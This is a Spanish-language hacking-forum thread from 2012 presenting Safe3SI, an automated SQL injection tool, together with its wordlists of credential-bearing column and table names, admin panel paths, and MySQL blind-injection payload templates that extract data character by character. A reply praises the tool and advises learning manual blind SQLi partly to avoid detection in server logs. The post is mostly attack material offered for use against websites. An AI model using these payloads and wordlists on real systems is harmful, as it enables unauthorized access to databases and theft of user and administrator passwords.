send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Safe3SI

  • 1 Respuestas
  • 1601 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Stuxnet

  • *
  • Underc0der
  • Mensajes: 259
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Devel Security
  • Twitter: _stuxnet
« en: Noviembre 16, 2012, 12:55:33 pm »



Safe3SI es un herramienta que automatiza el proceso de detección y aprovechamiento de defectos de inyección sql y de servidores de base de datos. Viene con un motor de detección de kick-ass, muchas características para el probador de penetración máxima y una amplia gama de interruptores de base de datos de rastro digital, sobre la obtención de datos de la base de datos, para acceder el sistema de archivos subyacente y ejecutar comandos en el sistema operativo a través de conexiones fuera de banda.

Columns:

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
about
access
account
accounts
admin
admin_id
admin_name
admin_pass
admin_passwd
admin_password
admin_psw
admin_pwd
admin_user
admin_userid
admin_username
adminemail
adminid
Administrateur
Administrator
administrator_name
administrators
adminlogin
adminmail
adminname
adminpass
adminpassword
adminpaw
adminpsw
adminpwd
admins
AdminUID
adminupass
adminuser
adminuserid
adminusername
adress
aid
Aide
aim
apwd
ArticleID
auid
blog
cc_number
cc_owner
cfg
cid
city
client
clientname
clientpassword
clients
clientusername
conf
config
content
converge_pass_hash
converge_pass_salt
crack
customer
customers
customers_password
data
db_hostname
db_password
db_username
dw
E-mail
e_mail
email
emailaddress
feed
feedback
gid
glmm
group
hash
id
id_member
images
index
isadmin
key
keywords
last_login
lastname
log
login
login_admin
login_name
login_pass
login_passwd
login_password
login_pw
login_pwd
login_user
login_username
logini
loginkey
logins
logo
mail
md5hash
mem_login
mem_pass
mem_passwd
mem_password
mem_pwd
member
member_id
member_login_key
member_name
memberid
membername
members
memlogin
mempassword
mima
mm
mpassword
msn
musername
my_email
my_name
my_password
my_username
myname
mypassword
myusername
name
nc
new
news
newsid
note
number
Numer
nummer
p
p_assword
p_word
pass
pass1word
pass_hash
pass_w
pass_word
passer
Passw
passwd
password
Passwort
passwrd
pe_aduser
pe_user
phone
POWER
psw
pswd
pw
pwd
pwd1
pword
pwrd
qq
sb_admin_name
sb_pwd
search
sesskey
setting
sid
spacer
status
Stocker
store
sysuser
telephone
temp_pass
temp_password
temppass
temppasword
text
texte
title
u
u_name
uid
un
uname
url
user
user1
user_admin
user_email
user_id
user_ip
user_level
user_login
user_n
user_name
user_pass
user_passw
user_passwd
user_password
user_pw
user_pwd
user_pword
user_pwrd
user_uname
user_username
user_usernm
user_usernun
user_usrnm
useradmin
userid
userip
Userlogin
usern
username
user_name
usernm
userpass
userpasswd
userPassword
userpw
userpwd
users
usr
usr2
usr_n
usr_name
usr_nusr
usr_pass
usr_pw
usrn
usrnam
usrname
usrnm
usrpass
usrs
website
wind
wp_users
xar_name
xar_pass
yh
yhm
yhmm
yonghu

WebPath:

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Stats/
ad/
ad_login/
ad_manage/
adm/
adm_login/
admin/
admin/default/
admin/index/
admin/login/
admin/manage/
admin1/
admin888/
admin_admin/
admin_login/
adminadmin/
administrator/
adminlogin/
amd/
article/admin/
backup/
chkadmin/
chklogin/
config/
database/
databases/
db/
dbase/
denglu/
eWebEditor/
editor/
files/
guanli/
houtai/
houtaiguanli/
htdocs/
htgl/
include/
includes/
incoming/
install/
login/
login1/
manage/
manager/
manager/login/
manual/
mrtg/
private/
public/
root/
secret/
secrets/
server-info/
server-status/
server_stats/
set/
setting/
setup/
snmp/
source/
sources/
sql/
statistics/
super/
superadmin/
sys_admin/
telephone/
temp/
temporary/
test/
tool/
tools/
up/
update/
upfile/
upload/
usage/
user/
users/
webadmin/
weblog/
weblogs/
webmaster/
webstats/
work/
wstats/
wwwlog/
wwwstats/
xtwh/
.htaccess
pma/
phpMyAdmin/
ad_login{ext}
ad_manage{ext}
addmember{ext}
adduser{ext}
add_user{ext}
add_file{ext}
add_pic{ext}
adm_login{ext}
admin123{ext}
admin1{ext}
admin888{ext}
admin_admin{ext}
admin_delete{ext}
admin_del{ext}
admin_edit{ext}
admin_index{ext}
admin_login{ext}
admin_main{ext}
admin_user{ext}
adminadduser{ext}
admindefault{ext}
admindelete{ext}
admindel{ext}
adminedit{ext}
adminindex{ext}
administrator{ext}
adminlogin{ext}
adminmanage{ext}
adminmember{ext}
admintab{ext}
adminuserlogin{ext}
adminuser{ext}
admin{ext}
ad{ext}
aspcheck{ext}
chkadmin{ext}
chklogin{ext}
config{ext}
conn{ext}
default{ext}
delete{ext}
denglu{ext}
editmember{ext}
edituser{ext}
editor{ext}
guanli{ext}
houtaiguanli{ext}
houtai{ext}
htgl{ext}
index_admin{ext}
index_manage{ext}
index{ext}
left{ext}
login_admin{ext}
login_out{ext}
login{ext}
logout{ext}
main{ext}
manage_index{ext}
manager{ext}
manage{ext}
members{ext}
member{ext}
menu{ext}
top{ext}
upfile{ext}
upload{ext}
up{ext}
users{ext}
user{ext}

MySql:

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
%20and%201=2%23
%20and%20(select%20char_length(<column>)%20from%20(select%20*%20from%20<database>.<table>%20order%20by%201%20limit%20<length>,1)%20t%20limit%201)%20between%20<min>%20and%20<temp>%20%23
%20and%20(select%20abs(ascii(substr(<column>,<index>,1)))%20from%20(select%20*%20from%20<database>.<table>%20order%20by%201%20limit%20<length>,1)%20t%20limit%201)%20between%20<min>%20and%20<temp>%20%23

Tables:

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
a_admin
account
accounts
ACT_INFO
ad
adm
admin
admin_login
admin_name
admin_pass
admin_password
admin_psw
admin_pwd
admin_user
admin_userinfo
admin_username
administrator
administrators
adminname
adminpass
adminpassword
adminpsw
admins
adminupass
adminuser
adminusername
Art
article
Autor
BBS
book
chat
Client
clients
clubconfig
cms_admin
cms_admins
cms_user
cms_users
company
config
Contact
content
contenu
control
controle
Country
customer
customers
dbadmins
download
dw
Event
gl
glmm
gly
group
guanli
guanliyuan
h_admin
images
Index
info
key
keywords
login
logon
logs
m_admin
main
manage
manager
mb_users
member
memberlist
members
mima
mm
movie
mpassword
musername
mybb_users
mysql
mysql.user
name
names
nc
new
news
order
pass
password
passwords
phpmyadmin.pma_table_info
pma_table_info
power
powers
psw
pswd
pw
pwd
pwd1
pwds
reg_user
reg_users
reguser
regusers
root
roots
session
setting
settings
site_login
site_logins
SITELOGIN
sitelogins
Subjects
Superuser
sys
sysadmin
sysadmins
sysconstraints
syssegments
System
systime
sysuser
sysusers
table
tables
tb_admin
tb_administrator
tb_login
tb_member
tb_members
tb_user
tb_username
tbl
tbl_user
tbl_users
tbladmins
tblConfigs
tblUser
test
Titel
u
u_n
u_name
u_p
u_pass
uid
user
user_admin
user_info
user_list
user_login
user_name
user_pw
UserControl
userinfo
username
usernames
userpasswd
userpassword
userpwd
users
usr
usr_pw
usrs
vb_user
vip
WebAdmin
webadmins
Webmaster
webmasters
webuser
webusers
x_admin
yhm
yhmm

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #1 en: Noviembre 16, 2012, 02:18:39 pm »
Buena tool, pero hago incapie en q todos deben aprender a realziar sqli y blind sqli a mano, ese es el verdadero reto y lo q lo hace interesante, porq encontrar el sqli es relativamente facil, y explotarla con una tool no es apropiado a no ser q  sea una DB muy amplia, ya q las tools llenan los logs, y salta el sqli apenas revisan los log. Buen Aporte!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!